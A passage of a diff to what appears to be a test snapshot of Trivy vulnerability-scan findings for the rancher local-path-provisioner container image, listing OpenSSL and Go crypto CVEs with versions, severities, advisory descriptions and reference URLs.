"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-21698", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2044628", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2045880", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050648", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050742", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2050743", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2065290", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107342", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107376", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107390", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107392", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "value": "https://www.tenable.com/security/tns-2022-09", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1i-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2020-1971", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/09/14/2", + "https://access.redhat.com/security/cve/CVE-2020-1971", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", + "https://linux.oracle.com/cve/CVE-2020-1971.html", + "https://linux.oracle.com/errata/ELSA-2021-9150.html", + "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", + "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", + "https://security.gentoo.org/glsa/202012-13", + "https://security.netapp.com/advisory/ntap-20201218-0005/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://ubuntu.com/security/notices/USN-4662-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2020-1971", + "https://www.debian.org/security/2020/dsa-4807", + "https://www.openssl.org/news/secadv/20201208.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", + ], + }, + "category": "Vulnerability", + "description": "The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: EDIPARTYNAME NULL pointer de-reference", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "value": "https://avd.aquasec.com/nvd/cve-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "value": "http://www.openwall.com/lists/oss-security/2021/09/14/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "value": "https://access.redhat.com/security/cve/CVE-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2154ab83e14ede338d2ede9bbe5cdfce5d5a6c9e", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f960d81215ebf3f65e03d4d5d857fb9b666d6920", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44676", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://linux.oracle.com/cve/CVE-2020-1971.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://linux.oracle.com/errata/ELSA-2021-9150.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://lists.apache.org/thread.html/r63c6f2dd363d9b514d0a4bcf624580616a679898cc14c109a49b750c@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "value": "https://lists.apache.org/thread.html/rbb769f771711fb274e0a4acb1b5911c8aab544a6ac5e8c12d40c5143@%3Ccommits.pulsar.apache.org%3E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00020.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "value": "https://security.gentoo.org/glsa/202012-13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "value": "https://ubuntu.com/security/notices/USN-4662-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://www.debian.org/security/2020/dsa-4807", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "value": "https://www.openssl.org/news/secadv/20201208.txt", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://www.tenable.com/security/tns-2020-11", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://www.tenable.com/security/tns-2021-09", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://www.tenable.com/security/tns-2021-10", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", + "references": [ + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + ], + }, + "category": "Vulnerability", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", + "references": [ { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://support.apple.com/kb/HT212528", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://support.apple.com/kb/HT212529", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://support.apple.com/kb/HT212534", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", - ], - }, - "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + 